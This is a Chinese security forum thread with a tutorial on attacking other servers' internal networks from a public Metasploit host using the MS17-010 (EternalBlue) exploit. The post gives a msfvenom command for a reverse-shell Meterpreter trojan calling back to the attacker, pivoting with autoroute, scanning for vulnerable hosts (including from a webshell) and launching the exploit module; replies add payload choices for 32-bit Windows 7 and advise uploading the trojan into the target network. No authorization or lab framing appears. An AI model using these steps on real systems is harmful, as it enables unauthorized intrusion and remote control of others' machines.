用户
搜索
  • TA的每日心情

    2017-5-28 08:43
  • 签到天数: 4 天

    连续签到: 1 天

    [LV.2]偶尔看看

    安全团队

    会是一回事,用又是一回事。

    Rank: 7Rank: 7Rank: 7

    80

    主题

    268

    帖子

    1976

    魔法币
    收听
    0
    粉丝
    40
    注册时间
    2016-9-4

    i春秋认证i春秋签约作者

    诚殷网络论坛 安全团队 会是一回事,用又是一回事 i春秋认证 i春秋签约作者 楼主
    发表于 2018-5-14 12:40:18 1327469
    本帖最后由 诚殷网络论坛 于 2018-5-14 05:06 编辑
    前言

    其实很多小白在对利用msf进行ms17010攻击的时候总是不成功,其实这都是因为网上大部分的文章都是写的内网对内网(192.168.1.2-->192.168.1.3)这样的案例,今天写了一下利用公网的MSF直接攻击其他服务器内网的案例。


    准备工作

    1.安装了Msf的公网主机+Ubuntu系统

    2.一台其他服务器内网存在445漏洞

    3.细心,细心,细心,钻研,钻研!!!

    开始第一步:公网主机操作

    生成msf木马:

    [AppleScript] 纯文本查看 复制代码
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的IP LPORT=6666 -f exe > /var/www/html/6666.exe

    Msf监听端口:6666


    可以看到,图中获取到了shell!


    添加路由


    第一步:run get_local_subnets (获取当前路由)


    第二步:run autoroute -s 192.168.3.0/24 (添加路由)


    第三步:run autoroute -p (查看已添加路由)



    使用Payload进行攻击


    第一步:background(转换到后台)


    第二步:use scanner/portscan/tcp (先扫描开放445端口的PC)


    第三步:exploit(开始扫描)

    .


    注意:扫描出来开放了445端口的PC,不一定就存在445漏洞。(如何精准定位?)


    如何列出那些存在445漏洞的PC?

    下载:

    游客,如果您要查看本帖隐藏内容请回复

    描述:

    工具的使用步骤如下:
    解压后在命令行下执行MS_17_010_Scan.exe,支持-ip 和-file两种参数。
    -ip参数可以指定IP扫描,同时支持IP段扫描:
    MS_17_010_Scan.exe -ip 192.168.44.129
    MS_17_010_Scan.exe -ip 192.168.44.129 192.168.44.133
    -file参数支持从文件读取IP列表进行扫描:
    MS_17_010_Scan.exe -file ip.txt
    工具将显示检测结果:如不存在风险将显示NOT Found Vuln,如存在风险将显示Found Vuln MS17-010及目标电脑的操作系统版本,如果IP地址无效或者漏洞端口未开则显示Exception。
    输出结果同时保存在当前目录的result.txt中。

    上面的工具也可以在webshell中使用,只需要把结果输出到 txt文档中即可。(例如:MS_17_010_Scan.exe -ip 192.168.44.129 >>jieguo.txt)


    攻击正式开始


    第一步:use exploit/windows/smb/ms17_010_eternalblue(切换到攻击模块)

    第二步:set rhost 192.168.3.38(设置存在445漏洞的PC电脑IP)

    第三步:exploit(执行攻击)

    第四步:攻击完成,并且自动返回一个shell控制台(如下图)


    广告一波:诚殷网络第十九期WEB基础培训要开始了,特别适合:小白,初学者,以及刚学不久的童鞋,各位请看下面:


         培训详情:http://url.cn/5dOeWfl
    echo "技术本不难,难见有心人,诚殷网络WEB渗透培训让你从另一个角度学习渗透!";
    工具的使用步骤如下:
    解压后在命令行下执行MS_17_010_Scan.exe,支持-ip 和-file两种参数。
    -ip参数可以指定IP扫描,同时支持IP段扫描:
    MS_17_010_Scan.exe -ip 192.168.44.129
    MS_17_010_Scan.exe -ip 192.168.44.129 192.168.44.133
    -file参数支持从文件读取IP列表进行扫描:
    MS_17_010_Scan.exe -file ip.txt
    使用道具 举报 回复
    诚殷网络论坛 安全团队 会是一回事,用又是一回事 i春秋认证 i春秋签约作者
    推荐
    发表于 2018-5-15 12:25:29
    大木瓜 发表于 2018-5-15 03:30
    想问一下 那个exe 是上传到内网机器中 然后扫描的吗  还是在ubantu中搭建运行exe的环境 ...

    如果你的机器不在内网,那么就需要传木马到他内网中一台机器,如果在,那么就直接调用ms17010模块
    echo "技术本不难,难见有心人,诚殷网络WEB渗透培训让你从另一个角度学习渗透!";
    使用道具 举报 回复


    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    使用道具 举报 回复
    发表于 2018-5-29 22:13:23

    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    使用道具 举报 回复
    诚殷网络论坛 安全团队 会是一回事,用又是一回事 i春秋认证 i春秋签约作者
    推荐
    发表于 2018-5-14 16:01:28
    mozas 发表于 2018-5-14 07:02
    win7 32位的怎么打

    set payload windows/meterpreter/reverse_tcp
    set payload windows/x64/meterpreter/reverse_tcp
    选择不同的payload即可。
    echo "技术本不难,难见有心人,诚殷网络WEB渗透培训让你从另一个角度学习渗透!";
    使用道具 举报 回复
    復                              
    使用道具 举报 回复
    +666666666666666666666666666666666666+666666666666666666666666666666666666+666666666666666666666666666666666666
    使用道具 举报 回复
    发表于 2018-5-15 11:30:28
    想问一下 那个exe 是上传到内网机器中 然后扫描的吗  还是在ubantu中搭建运行exe的环境
    皮一下很开心
    使用道具 举报 回复
    发表于 2018-5-14 13:50:01
    学习学习~~~~~
    使用道具 举报 回复
    发表于 2018-5-14 15:02:26
    win7 32位的怎么打
    使用道具 举报 回复
    发表于 2018-5-14 15:27:35
    利用公网Msf+MS17010跨网段攻击内网
    使用道具 举报 回复
    感谢分享
    使用道具 举报 回复
    很不错的干货呀
    使用道具 举报 回复
    发表于 2018-5-14 15:45:24
    我想问下,如果挂了代理 ,lhost 该是 代理ip 还是 本机ip呢?
    使用道具 举报 回复
    诚殷网络论坛 安全团队 会是一回事,用又是一回事 i春秋认证 i春秋签约作者
    15#
    发表于 2018-5-14 16:00:18
    Fox丶 发表于 2018-5-14 07:45
    我想问下,如果挂了代理 ,lhost 该是 代理ip 还是 本机ip呢?

    后面写
    echo "技术本不难,难见有心人,诚殷网络WEB渗透培训让你从另一个角度学习渗透!";
    使用道具 举报 回复
    发表于 2018-5-14 17:00:41
    6666666666666
    使用道具 举报 回复
    发表于 2018-5-14 17:03:48
    围观大佬
    使用道具 举报 回复
    围观大佬
    使用道具 举报 回复
    发表于 2018-5-14 18:47:06

    win7 32位的怎么打
    使用道具 举报 回复
    发表于 2018-5-14 19:15:14
    学习大哥操作
    使用道具 举报 回复
    发表于 2018-5-14 19:26:44
    666666666666666
    使用道具 举报 回复
    您需要登录后才可以回帖 登录 | 立即注册